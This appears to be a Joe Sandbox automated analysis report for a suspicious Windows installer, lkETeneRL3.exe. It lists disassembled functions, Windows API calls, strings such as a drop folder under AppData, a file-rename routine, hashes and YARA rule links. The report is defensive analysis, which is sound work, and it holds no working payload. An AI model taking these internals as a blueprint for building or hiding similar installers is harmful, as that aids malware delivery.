Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: 30ff8eedcc03066b87caa2a29a7ef1e7350fb4aaf77a02d24525aee886acae2a
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: 19E0EC3261425AEFEF609E659C00AEB7B7CFB05360F008432F925E6190D635F9219BA5

Function 00404094 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010456,00000000,00000000,00000000), ref: 004040A6

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
Instruction ID: add50700843ac817ab7d6e51381e723622021bba1cfe7f2961aa6f321ae6f442
Opcode Fuzzy Hash: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
Instruction Fuzzy Hash: 1CC04C71744201BAEA319B509D49F0777986750700F6644257320B60D1C6B4E410E62D

Function 0040407D Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
Instruction ID: a78b9239c319e9cb66b61a8ea9955aebbc10e43728856a3b978814f56e37e297
Opcode Fuzzy Hash: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
Instruction Fuzzy Hash: 19B092B6684200BAEE228B00DD09F457AB2E7A8742F008024B200240B0CAB200A1DB19

Function 004031E3 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 0040406A Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403E47), ref: 00404074

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
Instruction ID: 4b90da896e4fa09681504a9dabf2ba00c57f91177066947fb67d52e8ca440c18
Opcode Fuzzy Hash: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
Instruction Fuzzy Hash: FCA012324040009BCB014B90FE04C457F31A754300701C031E10180030C2310824FF09

Non-executed Functions

Function 004049F9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A11
GetDlgItem.USER32(?,00000408), ref: 00404A1C
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A66
LoadBitmapA.USER32(0000006E), ref: 00404A79
SetWindowLongA.USER32(?,000000FC,00404FF0), ref: 00404A92
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AA6
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AB8
SendMessageA.USER32(?,00001109,00000002), ref: 00404ACE
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404ADA
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AEC
DeleteObject.GDI32(00000000), ref: 00404AEF
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B1A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B26
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BBB
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BE6
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BFA
GetWindowLongA.USER32(?,000000F0), ref: 00404C29
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C37
ShowWindow.USER32(?,00000005), ref: 00404C48
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D45
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DAA
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DBF
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DE3
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E03
ImageList_Destroy.COMCTL32(00000000), ref: 00404E18
GlobalFree.KERNEL32(00000000), ref: 00404E28
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EA1
SendMessageA.USER32(?,00001102,?,?), ref: 00404F4A
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F59
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F79
ShowWindow.USER32(?,00000000), ref: 00404FC7
GetDlgItem.USER32(?,000003FE), ref: 00404FD2
ShowWindow.USER32(00000000), ref: 00404FD9

Strings

M, xrefs: 00404BA2
N, xrefs: 00404C83
, xrefs: 00404FB1

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: f71c4aa5fa736d427a4380ee5912dc7cb3dc5a811f5ff7b07bbbad78877c99f0
Instruction ID: 3cd80f6d66a0a8d02be1144e931921fec7cdafd03fadcad4e17be0217faf115b
Opcode Fuzzy Hash: f71c4aa5fa736d427a4380ee5912dc7cb3dc5a811f5ff7b07bbbad78877c99f0
Instruction Fuzzy Hash: 9D026EB0900209AFEB10DF94DD85AAE7BB5FB84315F10813AF611B62E1C7789E42DF58

Function 00404486 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004044D5
SetWindowTextA.USER32(00000000,?), ref: 004044FF
SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 004045B0
CoTaskMemFree.OLE32(00000000), ref: 004045BB
lstrcmpiA.KERNEL32(Remove folder: ,Tristram Setup: Completed), ref: 004045ED
lstrcatA.KERNEL32(?,Remove folder: ), ref: 004045F9
SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040460B

Part of subcall function 0040563D: GetDlgItemTextA.USER32(?,?,00000400,00404642), ref: 00405650

Part of subcall function 004060CE: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\lkETeneRL3.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403206,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 00406126
Part of subcall function 004060CE: CharNextA.USER32(?,?,?,00000000), ref: 00406133
Part of subcall function 004060CE: CharNextA.USER32(?,"C:\Users\user\Desktop\lkETeneRL3.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403206,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 00406138
Part of subcall function 004060CE: CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403206,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 00406148

GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 004046C9
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046E4

Part of subcall function 0040483D: lstrlenA.KERNEL32(Tristram Setup: Completed,Tristram Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
Part of subcall function 0040483D: wsprintfA.USER32 ref: 004048E3
Part of subcall function 0040483D: SetDlgItemTextA.USER32(?,Tristram Setup: Completed), ref: 004048F6

Strings

Remove folder: , xrefs: 004045E7, 004045EC, 004045F7
error, xrefs: 0040449F
di, xrefs: 0040448C
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises, xrefs: 004045D6
A, xrefs: 004045A9
Tristram Setup: Completed, xrefs: 00404583, 004045E6

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$Remove folder: $Tristram Setup: Completed$di$error
API String ID: 2624150263-1765972966
Opcode ID: 270dc7a5b9dcdb78d87257eb559ab6150f0e039b037db56f317b36bf3157eca3
Instruction ID: 175f10717e4f371f028a94a7e43d857af948bb7b3e906aba32508f1788989df3
Opcode Fuzzy Hash: 270dc7a5b9dcdb78d87257eb559ab6150f0e039b037db56f317b36bf3157eca3
Instruction Fuzzy Hash: 27A18FF1900209ABDB11AFA5CC45AAFB7B8EF85314F14843BF601B72D1D77C9A418B69

Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
Instruction ID: 89e5e1f79722e37631beb13baf5993bff89a91e8d172cde9574b2276e59dc765
Opcode Fuzzy Hash: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
Instruction Fuzzy Hash: CCF02072608100AFE700EBB48948AEEB778DF20324F60057BE240A20C1C7B84A849A3A

Function 00404191 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040421C
GetDlgItem.USER32(00000000,000003E8), ref: 00404230
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040424E
GetSysColor.USER32(?), ref: 0040425F
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040426E
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040427D
lstrlenA.KERNEL32(?), ref: 00404280
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040428F
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042A4
GetDlgItem.USER32(?,0000040A), ref: 00404306
SendMessageA.USER32(00000000), ref: 00404309
GetDlgItem.USER32(?,000003E8), ref: 00404334
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404374
LoadCursorA.USER32(00000000,00007F02), ref: 00404383
SetCursor.USER32(00000000), ref: 0040438C
ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 0040439F
LoadCursorA.USER32(00000000,00007F00), ref: 004043AC
SetCursor.USER32(00000000), ref: 004043AF
SendMessageA.USER32(00000111,00000001,00000000), ref: 004043DB
SendMessageA.USER32(00000010,00000000,00000000), ref: 004043EF

Strings

Remove folder: , xrefs: 0040435F
di, xrefs: 004042E5
\A@, xrefs: 00404394
open, xrefs: 00404397
N, xrefs: 00404322

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$Remove folder: $\A@$di$open
API String ID: 3615053054-348058109
Opcode ID: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
Instruction ID: aa20bcc63d66581fa7bbac4c1809bf2e03719b1a0f02ef32c38fc7c0d03722a0
Opcode Fuzzy Hash: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
Instruction Fuzzy Hash: 3D6191B1A40209BBEF109F61DC45F6A7B69FB84714F108036FB01BA2D1C7B8A951CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5

Function 00405BAC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405D3F,?,?), ref: 00405BBB
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405D3F,?,?), ref: 00405BDF
GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405BE8

Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D

GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C05
wsprintfA.USER32 ref: 00405C23
GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405C5E
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C6D
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CA5
SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFB
GlobalFree.KERNEL32(00000000), ref: 00405D0C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D13

Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\lkETeneRL3.exe,80000000,00000003), ref: 00405ADA
Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC

Strings

[Rename], xrefs: 00405C8D, 00405C9F
NUL, xrefs: 00405BB5
%s=%s, xrefs: 00405C19

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 222337774-4148678300
Opcode ID: 48efe9067dab4c6be72075fa3094db19553ee2d814aebd6cf6e6eb07f6957914
Instruction ID: f02436ff356463cbad731f06bd7f36315381bbfe77d8bed81a3cf794d1fe08c5
Opcode Fuzzy Hash: 48efe9067dab4c6be72075fa3094db19553ee2d814aebd6cf6e6eb07f6957914
Instruction Fuzzy Hash: 2231C274604B597BD2207B615D49F6B3A9CEF45758F24013BF905B22D2DA78AC008EBD

Function 004060CE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\lkETeneRL3.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403206,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 00406126
CharNextA.USER32(?,?,?,00000000), ref: 00406133
CharNextA.USER32(?,"C:\Users\user\Desktop\lkETeneRL3.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403206,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 00406138
